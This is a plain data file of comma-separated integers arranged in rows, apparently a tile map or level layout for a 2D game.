7,0,0,0,0,0,0,0,0,0,50,0,0,0,0,0,4,4,49,0,0,0,0,0,0,0,0,0,0,0,51,0,40,0,0,0,30,26,26,28,0,34,27,27,27,27,27,28,0,30,26,26,26,26,26,28,0,40,0,0,0,7,7,0,0,0,0,0,0,0,0,0,51,0,0,0,51,0,0,0,0,0,0,14,51,0,10,4,11,0,0,6,1,1,1,1,1,6,0,0,0,0,0,0,0,0,4,0,51,0,0,6,1,1,1,6,1,1,1,6,1,1,1,7,
7,0,0,51,0,0,0,0,0,0,0,0,0,0,0,0,4,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,40,0,50,0,30,26,29,32,0,33,26,26,26,26,26,28,0,33,29,29,29,29,29,32,0,40,50,0,0,7,7,0,0,0,0,0,0,51,0,0,0,0,51,0,0,0,0,0,0,0,0,14,0,0,0,0,0,0,0,6,1,1,1,1,1,6,0,0,0,0,0,0,0,0,4,9,0,0,0,6,1,1,1,6,1,1,1,6,1,1,1,7,
7,0,34,31,0,50,0,0,0,0,0,0,0,0,0,0,4,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,40,0,0,0,30,28,0,0,50,0,30,26,26,26,26,28,0,0,0,0,0,0,50,0,0,40,0,0,51,7,7,0,0,51,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,15,13,13,13,13,13,13,13,6,6,6,6,6,6,6,0,51,0,0,0,0,0,0,10,4,0,0,0,6,1,1,1,6,1,1,1,6,1,1,1,7,
7,34,26,26,31,0,0,0,0,0,0,0,51,0,0,0,4,4,0,0,0,0,0,51,0,0,0,0,0,0,0,0,40,0,0,0,30,28,0,0,0,0,30,26,26,26,26,28,0,34,27,27,27,27,27,31,0,40,0,0,0,7,7,50,0,0,0,0,0,0,51,51,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,51,0,0,0,0,51,0,0,4,0,0,0,6,1,1,1,6,1,1,1,6,1,1,1,7,
7,33,26,26,32,0,0,0,51,0,0,0,0,0,0,0,4,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,40,0,0,0,30,28,0,50,0,0,30,26,26,26,26,28,0,30,26,26,26,26,26,28,51,40,0,0,0,7,7,0,0,0,0,0,0,0,0,0,0,51,0,0,0,0,0,0,0,0,0,0,0,0,50,0,0,51,0,50,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,0,0,0,6,1,1,1,6,1,1,1,6,1,1,1,7,
7,0,33,32,0,0,0,0,0,0,0,0,0,0,0,0,4,4,0,0,0,0,0,0,0,0,0,0,50,0,0,0,40,0,0,0,30,28,0,0,0,0,33,29,29,29,29,32,0,30,26,26,26,26,26,28,0,40,50,0,0,7,7,0,0,0,0,0,0,6,6,6,6,6,6,6,13,13,13,18,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,50,0,0,0,0,0,0,0,0,0,4,9,0,0,6,6,6,6,6,6,1,6,6,6,6,6,7,
7,0,50,0,0,51,0,51,0,0,0,0,0,0,0,0,4,4,0,0,0,51,0,0,0,0,0,0,0,51,0,0,30,27,27,27,26,28,0,0,0,0,0,0,0,0,0,0,0,30,26,26,26,26,26,28,0,40,0,0,0,7,7,13,13,13,13,13,13,6,1,1,1,1,1,6,1,1,1,14,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,50,0,0,0,0,50,0,10,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,7,
7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,4,9,0,0,0,0,0,0,0,0,0,0,0,0,0,30,26,26,26,26,26,27,27,27,27,27,27,27,27,27,31,0,30,26,26,26,26,26,28,0,40,0,0,0,7,7,0,0,0,0,0,0,6,1,1,1,1,1,6,1,1,1,14,51,0,0,51,0,0,0,0,0,0,0,51,0,0,0,0,0,0,0,0,0,0,0,0,0,0,51,0,4,0,51,51,0,51,0,0,0,51,50,0,0,50,0,7,
7,0,0,0,0,34,31,0,0,0,0,0,51,0,0,0,10,4,4,0,0,0,0,0,0,0,0,0,0,0,0,0,33,29,29,29,29,29,29,29,29,29,29,29,29,29,26,28,0,30,26,26,26,26,26,28,0,40,0,0,0,7,7,0,0,0,0,0,0,6,1,1,1,1,1,1,1,1,1,14,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,7,
7,51,0,0,34,26,26,31,0,0,0,0,0,0,51,0,0,4,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,50,0,0,0,0,50,0,0,30,28,0,30,26,26,26,26,26,28,0,40,0,0,0,7,7,0,0,0,0,0,0,6,1,1,1,1,1,6,1,1,1,14,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,50,51,0,0,0,0,0,0,0,0,4,0,0,51,0,0,0,0,0,0,0,0,0,0,0,7,
7,0,0,0,33,26,26,32,0,51,0,0,0,0,0,0,0,4,4,0,0,0,0,0,0,0,0,0,0,0,0,0,34,27,27,27,27,27,27,27,31,0,0,0,0,0,30,28,51,30,26,26,26,26,26,28,0,40,0,0,0,7,7,0,51,0,0,0,0,6,1,1,1,1,1,6,1,1,1,14,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,0,0,0,0,0,0,0,0,50,0,0,0,0,0,7,
7,0,0,0,0,33,32,0,0,0,0,0,0,0,0,0,0,4,4,50,0,0,0,0,0,51,0,0,0,0,0,0,30,26,26,26,26,26,26,26,28,0,0,0,0,0,30,28,0,30,26,26,26,26,26,28,0,40,0,0,0,7,7,0,0,0,0,0,0,6,6,6,1,6,6,6,13,13,13,16,51,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,0,0,0,0,0,50,0,0,0,0,0,0,0,0,7,
7,0,0,0,0,0,0,0,0,0,0,34,31,0,0,0,0,4,4,0,0,0,0,0,0,0,0,0,0,0,0,0,30,26,26,26,26,26,26,26,28,49,0,0,51,0,30,28,0,30,26,26,26,26,26,28,0,40,0,0,0,7,7,0,0,0,0,0,0,51,14,0,50,0,0,0,0,0,0,0,0,51,0,0,0,0,0,0,0,0,0,51,0,0,0,0,0,0,0,0,0,0,0,0,51,0,0,0,4,51,0,0,0,0,0,0,0,0,0,0,0,0,0,7,
7,0,0,0,0,0,0,0,0,0,34,26,26,31,0,0,0,4,4,0,0,0,0,0,0,0,50,0,0,0,0,0,33,29,29,29,29,29,29,26,28,0,0,0,0,0,30,28,0,30,26,26,26,26,26,28,0,40,0,0,51,7,7,0,0,0,0,0,0,0,14,0,0,0,0,0,0,0,0,0,0,0,0,51,0,51,0,0,51,0,0,0,0,0,0,0,0,0,0,0,51,0,0,0,0,0,0,0,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,7,
7,0,0,0,0,0,0,0,0,0,33,26,26,32,0,0,0,4,4,0,50,0,51,0,0,0,0,0,0,50,0,50,0,0,0,0,0,0,0,30,26,27,27,27,27,27,26,32,0,33,26,26,26,26,26,28,0,40,0,0,0,7,7,0,51,0,0,0,0,0,14,0,0,0,51,0,0,0,0,0,51,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,51,0,0,0,0,0,4,0,0,0,0,0,0,0,51,0,0,0,0,0,0,7,
7,0,0,0,34,31,0,51,0,0,0,33,32,0,0,0,0,4,4,0,51,0,0,0,0,0,0,0,0,0,0,0,0,7,0,7,0,7,0,30,26,26,26,26,29,29,32,0,0,0,33,29,26,26,26,28,0,40,0,0,0,7,7,0,0,0,0,0,50,0,14,0,0,0,0,0,0,0,0,0,0,51,50,0,0,0,0,0,0,0,0,0,0,0,0,50,0,0,0,0,0,0,0,0,0,0,8,4,4,4,4,4,4,9,0,51,0,0,0,0,0,0,0,7,
7,0,0,0,30,28,0,0,0,0,0,0,0,0,0,0,0,4,4,0,0,0,0,0,0,50,0,51,0,0,0,0,7,12,7,12,7,50,0,30,26,26,26,28,0,0,0,0,0,0,0,0,30,26,26,28,50,40,0,51,0,7,7,0,0,0,0,0,0,0,14,0,0,0,0,51,0,0,0,51,0,0,0,0,0,0,50,0,0,0,0,0,0,51,0,0,0,0,0,0,0,0,50,50,0,0,4,4,4,4,4,4,4,4,0,0,0,0,0,0,0,0,0,7,
7,0,0,34,26,26,31,0,0,0,0,0,0,0,0,0,0,4,4,9,0,0,0,0,0,0,0,0,0,0,0,0,0,7,12,7,12,7,0,30,26,26,26,28,0,0,0,0,0,51,0,0,30,26,26,28,0,40,0,0,0,7,7,0,0,6,6,6,6,6,6,6,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,4,4,4,4,4,4,4,0,0,0,0,0,0,0,51,0,7,
7,0,0,33,26,26,32,0,50,0,0,0,0,0,0,0,0,10,4,4,0,0,0,0,0,0,0,0,0,0,51,0,7,12,7,12,7,0,0,33,29,29,29,32,0,0,0,0,0,0,0,0,30,26,26,28,50,40,0,0,0,7,7,0,0,6,1,1,1,1,1,6,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,51,0,51,0,0,0,50,0,0,0,0,0,51,0,0,0,4,4,4,4,4,4,4,4,0,0,50,51,0,0,0,0,0,7,
7,0,0,0,30,28,0,0,0,0,0,0,0,0,0,0,0,0,4,4,0,0,0,0,0,0,0,0,0,0,0,0,0,7,12,7,12,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,30,26,26,28,51,40,0,0,51,7,7,0,0,6,1,1,1,1,1,6,0,0,0,0,0,51,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,4,4,4,4,4,4,4,0,0,0,0,0,0,51,0,0,7,
7,0,0,0,33,32,0,0,0,0,0,51,0,0,0,0,50,0,4,4,0,0,0,0,0,0,0,0,0,0,0,0,7,12,7,12,7,0,0,34,27,27,27,31,0,0,0,0,0,0,0,0,30,26,29,32,0,40,0,0,0,7,7,0,0,6,1,1,1,1,1,1,0,0,0,0,6,6,1,6,6,6,6,6,1,6,6,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,4,4,4,4,4,4,4,0,0,0,0,0,0,0,0,0,7,
7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,4,0,0,0,0,0,0,0,0,0,0,0,0,0,7,12,7,12,7,0,30,26,26,26,28,0,0,0,0,0,0,0,0,30,28,0,0,0,37,0,0,0,7,7,0,0,6,1,1,1,1,1,6,0,0,0,0,6,1,1,1,1,1,1,1,1,1,6,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,4,4,4,4,4,4,4,0,0,0,0,51,0,51,0,0,7,
7,0,0,0,0,0,0,0,34,31,0,0,0,0,0,0,0,0,4,4,0,0,0,0,50,0,0,0,0,0,0,0,7,12,7,12,7,0,0,30,26,26,26,28,0,0,0,51,0,0,0,0,30,28,0,35,0,0,0,0,0,7,7,0,0,6,1,1,1,1,1,6,0,0,0,0,6,1,1,1,1,1,1,1,1,1,6,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,51,4,4,4,4,4,4,4,4,0,0,0,51,0,0,0,0,0,7,
7,0,0,0,0,0,0,34,26,26,31,0,0,0,0,0,0,0,4,4,50,51,0,0,0,0,0,0,0,0,0,0,0,7,0,7,0,7,0,30,26,26,26,26,27,27,27,27,27,27,27,27,26,28,0,40,0,35,0,0,0,7,7,0,0,6,1,1,1,1,1,6,50,0,0,0,6,1,1,1,1,1,1,1,1,1,6,0,0,0,50,0,0,0,51,0,0,0,0,0,0,0,0,0,50,0,4,4,4,4,4,4,4,4,0,0,0,0,0,51,0,0,0,7,
7,0,50,0,0,0,0,33,26,26,32,0,0,0,0,0,0,0,4,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,51,0,0,0,30,26,29,29,29,29,29,29,29,29,26,26,26,26,28,51,40,0,40,0,0,0,7,7,0,0,6,1,1,1,1,1,6,0,0,0,0,6,1,1,1,1,1,1,1,1,1,6,51,0,0,0,0,0,0,0,0,0,51,50,0,0,0,0,0,0,0,10,4,4,4,4,4,4,11,0,0,0,0,0,0,0,0,0,7,
7,0,0,0,0,0,0,0,33,32,0,0,0,0,0,51,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,34,27,27,27,27,27,27,26,28,0,0,51,0,0,0,0,0,30,26,26,26,28,0,40,0,40,0,0,0,7,7,0,50,6,1,1,1,1,1,6,0,0,0,0,6,6,6,6,6,6,6,6,6,6,6,0,0,6,6,1,6,6,6,6,6,6,6,6,6,1,6,6,0,0,0,0,0,0,0,10,4,0,51,0,0,0,0,0,0,0,0,7,
7,0,34,31,50,0,0,0,0,0,0,0,0,0,0,0,0,0,4,4,0,0,0,0,0,0,0,0,0,0,0,0,30,26,26,26,26,26,26,26,28,0,0,0,0,0,51,0,0,33,29,29,29,32,0,40,0,40,0,0,51,7,7,0,0,6,1,1,1,1,1,6,0,0,0,0,51,0,0,0,0,0,0,0,0,0,0,0,0,6,1,1,1,1,1,1,6,1,1,1,1,1,1,6,51,0,0,0,0,0,0,0,4,0,51,0,0,0,0,0,0,0,0,7,
7,34,26,26,31,0,0,0,0,0,0,0,0,0,0,0,0,0,4,4,0,0,0,50,0,0,0,0,0,0,0,0,30,26,26,26,26,26,26,26,28,0,0,0,0,0,0,0,0,0,0,0,0,0,0,40,0,40,0,0,0,7,7,0,0,1,1,1,1,1,1,6,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,6,1,1,1,1,1,1,6,1,1,1,1,1,1,6,0,0,0,0,0,0,0,0,1,51,0,0,0,0,0,50,0,0,0,7,
7,33,26,26,32,0,0,0,0,51,0,0,0,0,0,0,0,0,4,4,0,0,0,0,0,0,51,0,0,0,0,0,30,26,26,26,26,26,26,26,28,0,0,0,0,0,0,0,0,38,39,39,39,39,39,32,0,40,0,0,0,7,7,0,0,6,1,1,1,1,1,6,0,0,0,50,0,0,0,0,0,0,0,0,51,0,0,0,0,6,1,1,1,1,1,1,6,1,1,1,1,1,1,6,0,0,0,0,0,0,0,51,4,51,0,0,0,0,0,0,0,0,50,7,
7,50,33,32,0,0,0,0,0,0,51,0,51,0,0,0,0,0,4,4,0,0,0,0,0,0,0,0,0,0,0,0,30,26,26,26,26,26,26,26,28,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,40,0,0,0,7,7,0,0,6,6,6,6,6,6,6,0,0,0,0,0,51,0,0,0,0,0,0,0,51,0,0,0,6,1,1,1,1,1,1,6,1,1,1,1,1,1,6,0,0,0,0,0,0,0,0,4,0,0,0,0,0,50,0,0,0,0,7,
7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,
7,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,0,0,0,0,0,0,0,7,7,0,0,0,0,0,0,0,50,0,34,31,0,0,0,0,4,4,51,0,0,0,0,0,0,0,0,0,0,0,0,0,40,0,0,0,33,29,29,29,29,29,29,29,29,29,29,29,29,26,26,26,26,26,26,26,26,28,0,0,0,7,
7,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,0,0,0,0,0,0,0,7,7,0,0,0,0,0,0,0,0,34,26,26,31,0,0,0,4,4,0,0,0,0,0,0,0,51,0,0,0,0,0,51,40,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,51,30,26,26,26,26,26,26,26,28,0,0,0,7,
7,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,11,0,0,0,10,4,4,4,4,4,4,4,4,4,4,4,4,4,0,0,0,0,0,0,0,7,7,0,0,0,0,0,0,0,0,33,26,26,32,0,0,50,4,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,40,51,0,0,34,27,27,27,27,27,27,27,27,27,27,31,0,30,26,26,26,26,26,26,29,32,0,0,0,7,
7,4,4,4,4,4,4,4,11,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,10,4,4,4,4,4,4,4,4,51,0,51,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,7,7,0,0,0,0,0,0,0,0,0,33,32,0,0,0,50,4,4,0,0,0,0,0,0,0,0,0,0,0,51,0,51,40,0,0,0,30,26,26,26,26,26,26,26,26,26,26,28,0,30,26,26,26,26,26,28,0,0,0,0,0,7,
7,4,4,4,4,4,4,4,0,0,0,0,0,0,0,0,0,0,50,0,0,0,51,0,0,0,0,0,4,4,4,4,4,4,4,4,0,0,0,0,0,4,4,4,4,4,4,4,4,4,4,4,4,4,0,0,0,0,0,0,0,7,7,0,0,0,51,0,51,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,51,0,0,0,40,0,0,0,30,26,26,26,29,29,29,29,29,29,29,28,0,30,26,26,26,26,26,28,0,35,0,0,0,7,
7,4,4,4,4,4,4,4,0,0,0,0,0,0,0,0,0,0,0,0,50,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,0,0,0,0,0,4,4,4,4,4,4,4,4,4,4,4,4,4,9,0,0,50,0,50,0,7,7,0,51,0,0,0,0,0,0,0,0,51,0,0,0,0,4,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,40,0,0,0,30,26,26,28,0,0,0,0,0,0,0,40,0,30,26,26,26,26,26,28,0,40,0,0,0,7,
7,4,4,11,51,10,4,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,4,4,4,4,4,4,4,9,0,0,0,8,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,1,4,4,4,4,7,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,4,49,0,0,0,0,51,0,0,0,0,0,0,0,0,40,0,51,0,30,26,26,28,0,34,27,27,27,27,27,28,0,30,26,26,26,26,26,28,0,40,51,0,0,7,
7,4,4,0,0,0,4,4,0,0,0,0,0,0,51,0,0,0,0,0,0,0,0,0,0,0,0,0,4,4,4,4,4,4,4,4,4,1,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,1,4,4,4,4,7,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,51,4,4,0,50,0,0,0,0,0,0,0,0,0,0,0,0,40,0,0,0,30,26,29,32,0,33,26,26,26,26,26,28,0,33,29,29,29,29,29,32,0,40,0,0,0,7,
7,4,4,50,0,0,1,1,0,0,0,0,0,0,0,0,0,51,0,0,0,0,0,0,0,51,0,8,4,4,4,4,4,4,4,4,4,1,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,1,4,4,4,4,7,7,0,34,31,0,0,0,0,0,0,0,0,0,0,0,0,4,4,0,0,0,0,51,0,0,0,51,0,0,0,0,0,40,0,51,51,30,28,0,0,0,0,30,26,26,26,26,28,0,0,51,0,0,0,0,0,0,40,0,51,51,7,
7,4,4,9,0,8,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,1,4,4,4,4,4,4,4,4,4,4,4,4,1,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,1,4,4,4,4,7,7,34,26,26,31,0,0,0,0,0,51,0,51,51,0,0,4,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,40,0,0,0,30,28,0,0,0,0,30,26,26,26,26,28,0,34,27,27,27,27,27,31,0,40,0,0,0,7,
7,4,4,4,1,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,1,4,4,4,4,4,4,4,4,4,4,4,4,1,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,1,4,4,4,4,7,7,33,26,26,32,0,0,0,0,0,51,0,0,0,0,0,4,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,40,0,0,0,30,28,0,0,0,0,30,26,26,26,26,28,0,30,26,26,26,26,26,28,0,40,0,0,0,7,
7,4,4,4,1,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,1,4,4,4,4,4,4,4,4,4,4,4,4,1,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,1,4,4,4,4,7,7,0,33,32,0,0,0,0,0,0,0,0,0,0,0,0,4,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,40,0,0,51,30,28,0,0,0,0,33,29,29,29,29,32,0,30,26,26,26,26,26,28,0,40,0,0,0,7,
7,4,4,4,1,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,1,4,4,4,4,4,4,4,4,4,4,4,4,1,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,1,4,4,4,4,7,7,0,0,0,0,0,0,0,0,51,0,0,0,0,50,0,4,4,0,0,0,0,0,0,0,0,0,0,0,0,51,0,30,27,27,27,26,28,0,0,0,0,0,0,0,0,51,0,0,30,26,26,26,26,26,28,0,40,0,0,0,7,
7,4,4,4,1,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,1,4,4,4,4,4,4,4,4,4,11,0,0,0,10,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,1,4,4,4,4,7,7,0,0,0,0,50,0,0,0,0,0,0,0,0,0,0,4,4,9,0,0,0,0,0,0,0,0,0,0,0,0,0,30,26,26,26,26,26,27,27,27,27,27,27,27,27,27,31,0,30,26,26,26,26,26,28,0,40,0,0,0,7,
7,4,4,4,1,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,1,4,4,4,4,4,4,4,4,4,0,0,0,0,0,4,4,4,4,4,4,11,0,0,0,0,0,51,0,0,0,0,0,10,4,4,4,7,7,0,0,0,0,34,31,0,0,50,0,0,51,0,0,0,10,4,4,0,51,0,51,0,0,0,0,0,0,0,0,0,33,29,29,29,29,29,29,29,29,29,29,29,29,29,26,28,0,30,26,26,26,26,26,28,0,40,0,0,0,7,
7,4,4,4,1,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,1,4,4,4,4,4,4,4,4,4,51,0,0,0,0,4,4,4,4,4,4,0,7,0,0,0,0,0,0,51,0,0,0,0,4,4,4,7,7,0,0,0,34,26,26,31,0,0,0,0,0,0,0,0,0,4,4,0,0,51,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,30,28,51,30,26,26,26,26,26,28,0,40,0,0,0,7,
7,4,4,4,1,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,1,4,4,4,4,4,4,4,4,4,0,0,0,0,0,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0,0,0,7,0,4,4,4,7,7,0,0,0,33,26,26,32,0,0,0,0,0,0,0,0,0,4,4,0,0,0,0,0,0,0,0,51,50,0,0,0,34,27,27,27,27,27,27,27,31,0,0,0,0,0,30,28,0,30,26,26,26,26,26,28,0,40,0,0,0,7,
7,0,0,0,50,0,0,0,0,10,4,4,4,4,4,4,4,4,4,4,4,4,4,4,1,4,4,4,4,4,4,4,4,4,9,0,0,0,8,4,4,4,4,4,4,0,0,0,0,7,0,0,0,0,0,0,0,0,4,4,4,7,7,0,0,0,0,33,32,0,0,0,0,0,0,0,0,0,0,4,4,0,0,0,0,0,0,0,0,0,0,0,0,0,30,26,26,26,26,26,26,26,28,0,0,0,0,0,30,28,0,30,26,26,26,26,26,28,0,40,0,0,0,7,
7,0,0,0,0,0,0,0,0,0,4,4,4,4,4,4,4,4,4,4,4,4,4,4,1,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,0,0,0,0,0,0,0,0,0,0,0,0,0,4,4,4,7,7,0,0,0,0,0,0,0,0,0,0,34,31,0,0,0,50,4,4,0,0,0,0,0,0,0,0,0,0,0,0,0,30,26,26,26,26,26,26,26,28,49,0,0,0,0,30,28,0,30,26,26,26,26,26,28,0,40,0,0,0,7,
7,0,50,0,0,0,0,51,0,0,4,4,4,4,4,4,4,4,4,4,4,4,4,4,1,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,0,7,51,0,0,0,0,51,0,0,0,0,0,4,4,4,7,7,0,0,0,0,0,0,0,0,0,34,26,26,31,0,0,0,4,4,51,0,0,0,0,0,0,0,0,0,0,0,51,33,29,29,29,29,29,29,26,28,50,0,0,0,0,30,28,0,30,26,26,26,26,26,28,0,40,0,0,0,7,
7,0,0,0,0,0,0,0,0,0,4,4,4,4,4,4,4,4,4,4,4,11,0,0,0,0,0,0,0,10,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,0,0,0,0,0,0,0,0,0,0,0,0,0,4,4,4,7,7,0,50,0,0,0,0,0,0,0,33,26,26,32,0,51,0,4,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,30,26,27,27,27,27,27,26,32,0,33,26,26,26,26,26,28,50,40,50,0,0,7,
7,0,0,0,0,0,0,0,0,0,4,4,4,4,4,4,4,4,4,4,4,50,0,0,0,0,0,0,0,0,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,0,0,0,0,0,0,0,0,0,51,0,0,0,4,4,4,7,7,0,0,0,34,31,0,0,51,51,0,33,32,0,0,0,0,4,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,7,0,7,0,7,0,30,26,26,26,26,29,29,32,0,51,0,33,29,26,26,26,28,0,40,0,0,0,7,
7,0,0,0,0,0,50,0,0,0,4,4,4,4,4,4,4,4,4,4,4,0,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,4,1,51,0,0,51,0,51,0,0,7,0,0,50,0,4,4,4,7,7,0,0,0,30,28,0,0,51,0,51,0,0,0,0,0,0,4,4,0,0,0,0,0,51,0,0,0,0,0,0,0,7,12,7,12,7,0,0,30,26,26,26,28,50,0,0,0,0,0,0,0,30,26,26,28,0,40,0,0,0,7,
7,0,50,0,0,0,0,0,0,0,4,4,4,4,4,4,4,4,4,4,4,0,0,0,0,0,0,0,0,0,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,0,0,0,0,0,7,0,0,0,51,0,0,0,4,4,4,7,7,0,0,34,26,26,31,0,0,0,0,0,0,0,0,0,0,4,4,9,0,0,0,0,51,0,0,0,0,0,0,0,0,7,12,7,12,7,0,30,26,26,26,28,0,0,0,0,0,0,0,0,30,26,26,28,0,40,0,0,0,7,
7,0,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,9,0,0,0,0,0,0,0,0,0,0,0,8,4,4,4,7,7,0,0,33,26,26,32,0,0,0,0,0,0,0,0,0,0,10,4,4,0,0,0,0,0,0,0,0,0,0,0,0,7,12,7,12,7,0,0,33,29,29,29,32,51,0,51,0,0,0,0,0,30,26,26,28,0,40,0,0,0,7,
7,0,0,0,0,0,0,0,0,0,4,4,4,4,4,4,4,4,4,4,4,0,51,0,0,0,0,0,0,0,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,1,4,4,4,4,4,4,7,7,0,0,0,30,28,0,0,0,0,0,0,51,0,0,0,0,0,4,4,0,0,50,0,51,0,0,0,0,0,0,0,0,7,12,7,12,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,30,26,26,28,0,40,0,0,0,7,
7,0,0,0,0,0,0,0,0,0,4,4,4,4,4,4,4,4,4,4,4,0,0,0,0,0,0,0,0,50,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,1,4,4,4,4,4,4,7,7,0,0,0,33,32,0,0,0,0,0,0,0,0,0,0,0,0,4,4,0,0,0,0,0,0,0,0,0,0,0,0,7,12,7,12,7,0,0,34,27,27,27,31,0,0,0,0,0,0,0,0,30,26,29,32,51,40,0,0,0,7,
7,0,0,0,0,0,0,0,0,0,4,4,4,4,4,4,4,4,4,4,4,0,0,51,0,0,0,0,0,0,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,1,4,4,4,4,4,4,7,7,51,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,4,0,0,0,0,0,0,0,0,0,0,0,0,0,7,12,7,12,7,0,30,26,26,26,28,0,0,0,0,0,0,0,0,30,28,0,0,0,37,0,0,0,7,
7,0,0,50,0,0,0,0,0,50,4,4,4,4,4,4,4,4,4,4,4,9,0,0,0,50,0,0,0,8,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,1,4,4,4,4,4,4,7,7,0,0,0,0,0,0,0,34,31,0,0,0,0,0,0,0,0,4,4,0,0,0,0,0,0,0,0,0,51,0,0,7,12,7,12,7,0,0,30,26,26,26,28,0,0,0,0,0,0,0,0,30,28,0,35,0,0,0,0,0,7,
